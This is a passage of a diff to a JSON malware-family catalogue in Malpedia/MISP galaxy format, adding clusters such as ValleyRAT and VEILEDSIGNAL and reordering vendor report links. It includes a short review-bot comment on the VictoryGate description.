@@ -49127,14 +51409,110 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_103", + "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/syssphinx-fin8-backdoor", "https://otx.alienvault.com/pulse/61e7f74a936eea5d44026b8e" ], - "synonyms": [], + "synonyms": [ + "Sardonic" + ], "type": [] }, "uuid": "07106811-cd07-4d05-906d-c05208758b00", "value": "Unidentified 103 (FIN8)" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_104", + "https://twitter.com/jaydinbas/status/1663916211975987201" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ec530093-5ffc-45f1-b04d-accf3269b2d2", + "value": "Unidentified 104" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_105", + "https://twitter.com/h2jazi/status/1681426768597778440" + ], + "synonyms": [], + "type": [] + }, + "uuid": "07464f74-f587-4266-b828-448c67d2bd85", + "value": "Unidentified 105" + }, + { + "description": "This is possibly related to the MATA framework / Dacls.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_106", + "https://www.virustotal.com/gui/file/3c1cfc2b8b7e5c2d713ec5f329aa58a6b56a08240199761ba6da91e719d30705/detection" + ], + "synonyms": [], + "type": [] + }, + "uuid": "da2d8044-ed12-4951-bcd8-fd1e1335244a", + "value": "Unidentified 106" + }, + { + "description": "Small shellcode downloader, likely used by APT29.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_107", + "https://lab52.io/blog/2344-2/", + "https://blog.eclecticiq.com/german-embassy-lure-likely-part-of-campaign-against-nato-aligned-ministries-of-foreign-affairs#a3", + 
"https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA%3D%3D&mid=2247494783&idx=1&sn=612cf3cea1ef62e04bfb6bd0ce3b6b65&chksm=f9ed80c0ce9a09d6f5edc1424df5260cb9a9cf55fe92bd922407eef960650e91ec8cc46933ab&scene=178&cur_album_id=1375769135073951745" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e83a3731-9c84-4e36-a2da-9e6c9c2461d7", + "value": "Unidentified 107 (APT29)" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_108", + "https://www.virustotal.com/gui/file/8c94a3cef4e45a1db05ae9723ce5f5ed66fc57316e9868f66c995ebee55f5117/detection" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ee09eba1-e96e-476f-9372-e99218d8ab90", + "value": "Unidentified 108" + }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_109", + "https://twitter.com/malwrhunterteam/status/1689533484597952514" + ], + "synonyms": [], + "type": [] + }, + "uuid": "ad37d6ad-e9b7-4652-8a2e-502b170932e7", + "value": "Unidentified 109 (Lazarus?)" + }, + { + "description": "According to Deep Instinct, this information stealer is written in Rust and was observed in Operation Rusty Flag.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.unidentified_110", + "https://www.deepinstinct.com/blog/operation-rusty-flag-a-malicious-campaign-against-azerbaijanian-targets" + ], + "synonyms": [], + "type": [] + }, + "uuid": "00dac929-3038-4fc1-a1a5-0fd895126e92", + "value": "Unidentified 110 (RustyFlag)" + }, { "description": "", "meta": { 
@@ -49170,11 +51548,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.upatre", - "https://secrary.com/ReversingMalware/Upatre/", "https://marcoramilli.com/2020/06/24/is-upatre-downloader-coming-back/", + "https://secrary.com/ReversingMalware/Upatre/", "https://johannesbader.ch/2015/06/Win32-Upatre-BI-Part-1-Unpacking/", - "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/", - "https://unit42.paloaltonetworks.com/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/" + "https://unit42.paloaltonetworks.com/ticked-off-upatre-malwares-simple-anti-analysis-trick-to-defeat-sandboxes/", + "https://researchcenter.paloaltonetworks.com/2018/07/unit42-upatre-continues-evolve-new-anti-analysis-techniques/" ], "synonyms": [], "type": [] 
@@ -49199,20 +51577,20 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.urlzone", - "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", - "http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", - "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", - "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/", - "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0", - "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", - "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware", - "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", - "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", - "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features", "https://www.gdatasoftware.com/blog/2013/12/23978-bebloh-a-well-known-banking-trojan-with-noteworthy-innovations", - "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA", + "https://www.virusbulletin.com/virusbulletin/2012/09/urlzone-reloaded-new-evolution/", + "https://www.proofpoint.com/us/threat-insight/post/urlzone-top-malware-japan-while-emotet-and-line-phishing-round-out-landscape-0", + "https://jsac.jpcert.or.jp/archive/2020/pdf/JSAC2020_5_sajo-takeda-niwa_en.pdf", "https://www.fireeye.com/blog/threat-research/2016/01/urlzone_zones_inon.html", - "https://www.cybereason.com/blog/new-ursnif-variant-targets-japan-packed-with-new-features" + "https://krebsonsecurity.com/2011/07/trojan-tricks-victims-into-transfering-funds/", + 
"http://blog.inquest.net/blog/2019/03/09/Analyzing-Sophisticated-PowerShell-Targeting-Japan/", + "https://mp.weixin.qq.com/s/NRytT94ne5gKN31CSLq6GA", + "https://www.proofpoint.com/us/threat-insight/post/Vawtrak-UrlZone-Banking-Trojans-Target-Japan", + "https://www.johannesbader.ch/2015/01/the-dga-of-shiotob/", + "https://www.proofpoint.com/us/threat-insight/post/holiday-lull-not-so-much", + "https://www.crowdstrike.com/blog/cutwail-spam-campaign-uses-steganography-to-distribute-urlzone/", + "https://www.proofpoint.com/us/threat-insight/post/threat-actor-profile-ta544-targets-geographies-italy-japan-range-malware" ], "synonyms": [ "Bebloh", 
@@ -49228,23 +51606,24 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.uroburos", - "https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", - "https://artemonsecurity.com/snake_whitepaper.pdf", "https://www.carbonblack.com/2017/08/18/threat-analysis-carbon-black-threat-research-dissects-png-dropper/", - "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf", - "https://www.secureworks.com/research/threat-profiles/iron-hunter", - "https://www.circl.lu/pub/tr-25/", - "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", - "https://exatrack.com/public/Uroburos_EN.pdf", - "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", - "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", - "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", "https://www.gdatasoftware.com/blog/2014/11/23937-the-uroburos-case-new-sophisticated-rat-identified", - "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a", - "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", "https://artemonsecurity.com/uroburos.pdf", + "https://www.gdatasoftware.com/blog/2014/05/23958-uroburos-rootkit-belgian-foreign-ministry-stricken", + "https://research.nccgroup.com/2018/11/22/turla-png-dropper-is-back/", + "https://exatrack.com/public/Uroburos_EN.pdf", + "https://artemonsecurity.com/snake_whitepaper.pdf", + "https://www.circl.lu/pub/tr-25/", + "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots", + "https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/november/turla-png-dropper-is-back/", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + 
"https://www.gdatasoftware.com/blog/2014/06/23953-analysis-of-uroburos-using-windbg", + "https://www.secureworks.com/research/threat-profiles/iron-hunter", "https://www.gdatasoftware.com/blog/2014/03/23966-uroburos-deeper-travel-into-kernel-protection-mitigation", - "https://www.gdatasoftware.com/blog/2014/02/23968-uroburos-highly-complex-espionage-software-with-russian-roots" + "https://www.gdatasoftware.com/blog/2014/10/23941-com-object-hijacking-the-discreet-way-of-persistence", + "https://www.crysys.hu/publications/files/tedi/ukatemicrysys_territorialdispute.pdf", + "https://exatrack.com/public/Tricephalic_Hellkeeper.pdf" ], "synonyms": [ "Snake" @@ -49259,9 +51638,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbculprit", + "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view", "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://securelist.com/cycldek-bridging-the-air-gap/97157/", - "https://drive.google.com/file/d/11otA_VmL061KcFC5MhDYuNdIKHYbpyrd/view" + "https://securelist.com/cycldek-bridging-the-air-gap/97157/" ], "synonyms": [], "type": [] @@ -49274,9 +51653,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.usbferry", + "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf", "https://blog.trendmicro.com/trendlabs-security-intelligence/tropic-troopers-back-usbferry-attack-targets-air-gapped-environments/", - "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf", - "https://documents.trendmicro.com/assets/Tech-Brief-Tropic-Trooper-s-Back-USBferry-Attack-Targets-Air-gapped-Environments.pdf" + "https://www.welivesecurity.com/wp-content/uploads/2021/12/eset_jumping_the_air_gap_wp.pdf" ], "synonyms": [], "type": [] 
@@ -49289,8 +51668,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vadokrist",
- "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/",
- "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf"
+ "https://www.welivesecurity.com/wp-content/uploads/2021/05/eset_threat_report_t12021.pdf",
+ "https://www.welivesecurity.com/2021/01/21/vadokrist-wolf-sheeps-clothing/"
 ],
 "synonyms": [],
 "type": []
@@ -49311,14 +51690,28 @@
 "uuid": "006621d1-a3bd-40f2-a55c-d79c84879a6b",
 "value": "Vaggen"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.valley_rat",
+ "https://www.proofpoint.com/us/blog/threat-insight/chinese-malware-appears-earnest-across-cybercrime-threat-landscape",
+ "https://www.secrss.com/articles/52018"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "fcf8f520-27a9-493e-a274-fbfd70b733b0",
+ "value": "ValleyRAT"
+ },
 {
 "description": "",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.valuevault",
- "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html",
 "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/",
- "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae"
+ "https://cyware.com/blog/apt34-the-helix-kitten-cybercriminal-group-loves-to-meow-middle-eastern-and-international-organizations-48ae",
+ "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html"
 ],
 "synonyms": [],
 "type": []
@@ -49344,8 +51737,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vapor_rage",
- "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
 "https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns",
+ "https://www.incibe-cert.es/sites/default/files/contenidos/estudios/doc/incibe-cert_estudio_analisis_nobelium_2022_v1.pdf",
 "https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58"
 ],
 "synonyms": [
@@ -49361,8 +51754,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.varenyky",
- "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/",
- "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/"
+ "https://krebsonsecurity.com/2019/12/nuclear-bot-author-arrested-in-sextortion-case/",
+ "https://www.welivesecurity.com/2019/08/08/varenyky-spambot-campaigns-france/"
 ],
 "synonyms": [],
 "type": []
@@ -49375,17 +51768,17 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vawtrak",
- "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
- "https://medium.com/@Ilandu/vawtrak-malware-824818c1837",
- "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
- "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
 "https://threatpost.com/pos-attacks-net-crooks-20-million-stolen-bank-cards/117595/",
+ "https://blog.fox-it.com/2018/08/09/bokbot-the-rebirth-of-a-banker/",
+ "https://medium.com/@Ilandu/vawtrak-malware-824818c1837",
 "http://thehackernews.com/2017/01/neverquest-fbi-hacker.html",
- "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest",
 "https://www.secureworks.com/research/dyre-banking-trojan",
 "https://www.blueliv.com/downloads/network-insights-into-vawtrak-v2.pdf",
- "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
 "https://info.phishlabs.com/blog/the-unrelenting-evolution-of-vawtrak",
+ "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree",
+ "https://www.crowdstrike.com/blog/sin-ful-spiders-wizard-spider-and-lunar-spider-sharing-the-same-web/",
+ "https://fidelissecurity.com/threatgeek/archive/me-and-mr-robot-tracking-actor-behind-man1-crypter/",
 "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf"
 ],
 "synonyms": [
@@ -49418,8 +51811,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vegalocker",
- "https://twitter.com/malwrhunterteam/status/1095024267459284992",
 "https://www.symantec.broadcom.com/hubfs/SED/SED_Threat_Hunter_Reports_Alerts/SED_FY22Q2_SES_Ransomware-Threat-Landscape_WP.pdf",
+ "https://twitter.com/malwrhunterteam/status/1095024267459284992",
 "https://twitter.com/malwrhunterteam/status/1093136163836174339",
 "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/buran-ransomware-the-evolution-of-vegalocker/",
 "https://medium.com/walmartglobaltech/man1-moskal-hancitor-and-a-side-of-ransomware-d77b4d991618"
@@ -49433,6 +51826,19 @@
 "uuid": "704bb00f-f558-4568-824c-847523700043",
 "value": "VegaLocker"
 },
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.veiledsignal",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "b75f0dfd-15df-439d-8ff0-8e8f87656565",
+ "value": "VEILEDSIGNAL"
+ },
 {
 "description": "Ransomware that appears to require manually installation (believed to be via RDP). Encrypts files with .velso extension. ",
 "meta": {
@@ -49465,8 +51871,8 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom",
 "https://www.cybeseclabs.com/2020/05/07/venom-remote-administration-tool-from-venom-software/",
- "https://blog.malwarelab.pl/posts/venom/",
- "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html"
+ "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
+ "https://blog.malwarelab.pl/posts/venom/"
 ],
 "synonyms": [],
 "type": []
@@ -49480,10 +51886,10 @@
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.venom_lnk",
 "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9",
- "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
 "https://www.esentire.com/web-native-pages/unmasking-venom-spider",
- "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire",
- "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/"
+ "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/",
+ "https://www.esentire.com/blog/hackers-spearphish-corporate-hiring-managers-with-poisoned-resumes-infecting-them-with-the-more-eggs-malware",
+ "https://www.esentire.com/security-advisories/hackers-spearphish-professionals-on-linkedin-with-fake-job-offers-infecting-them-with-malware-warns-esentire"
 ],
 "synonyms": [],
 "type": []
@@ -49522,8 +51928,8 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vermin",
- "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
 "https://www.welivesecurity.com/2018/07/17/deep-dive-vermin-rathole/",
+ "https://www.fireeye.com/blog/threat-research/2019/04/spear-phishing-campaign-targets-ukraine-government.html",
 "https://researchcenter.paloaltonetworks.com/2018/01/unit42-vermin-quasar-rat-custom-malware-used-ukraine/"
 ],
 "synonyms": [],
@@ -49550,12 +51956,12 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vhd_ransomware",
- "https://twitter.com/GrujaRS/status/1241657443282825217",
- "https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-hermit-kingdoms-ransomware-play.html",
+ "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/",
 "https://seguranca-informatica.pt/secrets-behind-the-lazaruss-vhd-ransomware/",
- "https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/"
+ "https://twitter.com/GrujaRS/status/1241657443282825217",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-hermit-kingdoms-ransomware-play.html",
+ "https://securelist.com/apt-trends-report-q2-2020/97937/",
+ "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/the-sound-of-malware.html"
 ],
 "synonyms": [],
 "type": []
@@ -49564,14 +51970,14 @@
 "value": "VHD Ransomware"
 },
 {
- "description": "VictoryGate was the name of a cryptomining botnet, which was disrupted by ESET researchers in April 2020. The used malware itself was also referred to as VictoryGate. It was spotted in May 2019 and targeted mainly Latin American users, specifically, Peru (Criptonizando states 90% of the botnet publication residing there). Both public and private sectors were targeted.\r\nThis cryptojacking malware was specialized in Monero (XRM) cryptocurrency.",
+ "description": "VictoryGate was the name of a cryptomining botnet, which was disrupted by ESET researchers in April 2020. The used malware itself was also referred to as VictoryGate. It was spotted in May 2019 and targeted mainly Latin American users, specifically, Peru (Criptonizando states 90% of the botnet publication residing there). Both public and private sectors were targeted.\r\nThis cryptojacking malware was specialized in Monero (XRM) cryptocurrency. VictoryGate shows very strong code overlap with win.orchard.",
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.victorygate",
+ "https://www.eset.com/int/about/newsroom/press-releases/research/eset-researchers-disrupt-cryptomining-botnet-victorygate/",
 "https://www.welivesecurity.com/2020/04/23/eset-discovery-monero-mining-botnet-disrupted/",
- "https://criptonizando.com/35-mil-computadores-foram-infectados-na-america-latina-por-malware-que-minerava-monero/",
 "https://www.advintel.io/post/economic-growth-digital-inclusion-specialized-crime-financial-cyber-fraud-in-latam",
- "https://www.eset.com/int/about/newsroom/press-releases/research/eset-researchers-disrupt-cryptomining-botnet-victorygate/"
+ "https://criptonizando.com/35-mil-computadores-foram-infectados-na-america-latina-por-malware-que-minerava-monero/"
 ],
 "synonyms": [],
 "type": []
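Review bot: The sentence appended to the VictoryGate description, `VictoryGate shows very strong code overlap with win.orchard.`, embeds a Malpedia family identifier in free text, where consumers of this galaxy cannot resolve it. If the Orchard family has its own cluster in this file, the overlap is better expressed as a `related` entry pointing at that cluster's uuid, with the prose naming the family as "Orchard" rather than by its Malpedia id, so that tooling can follow the link; if it does not, a short parenthetical saying that `win.orchard` is a Malpedia identifier would help readers. I cannot tell from this hunk whether such a cluster exists, and if the description is copied verbatim from upstream the change may belong in the generator instead.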
@@ -49584,59 +51990,64 @@
 "meta": {
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar",
- "https://isc.sans.edu/diary/rss/28468",
+ "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
+ "https://asec.ahnlab.com/en/30445/",
+ "https://cert.pl/en/posts/2021/10/vidar-campaign/",
+ "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal",
+ "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
+ "https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing",
+ "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
+ "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
+ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
+ "https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader",
 "https://ke-la.com/information-stealers-a-new-landscape/",
- "https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/",
- "https://blog.jaalma.io/vidar-infostealer-analysis/",
- "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
- "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
- "https://intel471.com/blog/privateloader-malware",
+ "https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google",
+ "https://www.team-cymru.com/post/darth-vidar-the-aesir-strike-back",
+ "https://threatpost.com/microsoft-help-files-vidar-malware/179078/",
+ "https://eln0ty.github.io/malware%20analysis/vidar/",
+ "https://isc.sans.edu/diary/rss/28468",
+ "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/",
+ "https://asec.ahnlab.com/en/30875/",
+ "https://asec.ahnlab.com/en/22932/",
+ "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
 "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d",
+ "https://community.emergingthreats.net/t/vidar-stealer-picks-up-steam/271",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468",
+ "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/",
+ "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
+ "https://blog.jaalma.io/vidar-infostealer-analysis/",
+ "https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/",
+ "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
+ "https://www.esentire.com/blog/batloader-continues-to-abuse-google-search-ads-to-deliver-vidar-stealer-and-ursnif",
+ "https://www.secureworks.com/research/the-growing-threat-from-infostealers",
 "https://kienmanowar.wordpress.com/2022/12/17/quicknote-vidarstealer-analysis/",
 "https://tccontre.blogspot.com/2019/03/infor-stealer-vidar-trojanspy-analysis.html",
- "https://www.trendmicro.com/en_us/research/21/i/fake-installers-drop-malware-and-open-doors-for-opportunistic-attackers.html",
- "https://www.bleepingcomputer.com/news/security/fake-pixelmon-nft-site-infects-you-with-password-stealing-malware/",
- "https://twitter.com/GroupIB_GIB/status/1570821174736850945",
- "https://eln0ty.github.io/malware%20analysis/vidar/",
- "https://asec.ahnlab.com/ko/25837/",
- "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign",
- "https://asec.ahnlab.com/en/22932/",
- "https://asec.ahnlab.com/en/30445/",
- "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/",
- "https://www.cynet.com/blog/cyops-lighthouse-vidar-stealer/",
- "https://blog.minerva-labs.com/vidar-stealer-evasion-arsenal",
- "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/",
- "https://blog.cyble.com/2022/11/08/massive-youtube-campaign-targeting-over-100-applications-to-deliver-info-stealer/",
- "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468",
- "https://medium.com/s2wlab/deep-analysis-of-vidar-stealer-ebfc3b557aed",
- "https://asec.ahnlab.com/en/30875/",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://twitter.com/sisoma2/status/1409816282065743872",
- "https://cert.pl/en/posts/2021/10/vidar-campaign/",
- "https://www.bleepingcomputer.com/news/security/gandcrab-operators-use-vidar-infostealer-as-a-forerunner/",
- "https://www.youtube.com/watch?v=lxdlNOaHJQA",
- "https://www.csoonline.com/article/3654849/microsoft-help-files-repurposed-to-contain-vidar-malware-in-new-campaign.html",
- "https://www.zscaler.com/blogs/security-research/vidar-distributed-through-backdoored-windows-11-downloads-and-abusing",
- "https://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
- "https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure",
- "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
- "https://community.emergingthreats.net/t/vidar-stealer-picks-up-steam/271",
- "https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/",
- "https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/",
 "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/vidar-malware-launcher-concealed-in-help-file/",
- "https://securelist.com/nullmixer-oodles-of-trojans-in-a-single-dropper/107498/",
+ "https://intel471.com/blog/privateloader-malware",
+ "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware",
+ "https://www.youtube.com/watch?v=lxdlNOaHJQA",
 "https://blog.sekoia.io/traffers-a-deep-dive-into-the-information-stealer-ecosystem",
- "https://darktrace.com/blog/vidar-info-stealer-malware-distributed-via-malvertising-on-google",
- "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk",
- "https://blog.malwarebytes.com/threat-analysis/2019/01/vidar-gandcrab-stealer-and-ransomware-combo-observed-in-the-wild/",
- "https://www.youtube.com/watch?v=NI_Yw2t9zoo",
- "https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
+ "https://www.cynet.com/blog/cyops-lighthouse-vidar-stealer/",
+ "https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign",
 "https://www.quorumcyber.com/wp-content/uploads/2023/01/Malware-Analysis-Vidar.pdf",
- "https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf",
- "https://malwarology.substack.com/p/malicious-packer-pkr_ce1a?r=1lslzd",
+ "https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/",
+ "https://twitter.com/sisoma2/status/1409816282065743872",
+ "https://asec.ahnlab.com/ko/25837/",
+ "https://go.recordedfuture.com/hubfs/reports/cta-2022-0802.pdf",
+ "https://docs.google.com/spreadsheets/d/1nx42rdMdkCrvlmACDi3CHseyG87iSV1Y6rGZYq_-oDk",
+ "https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-vidar-stealer",
+ "https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper",
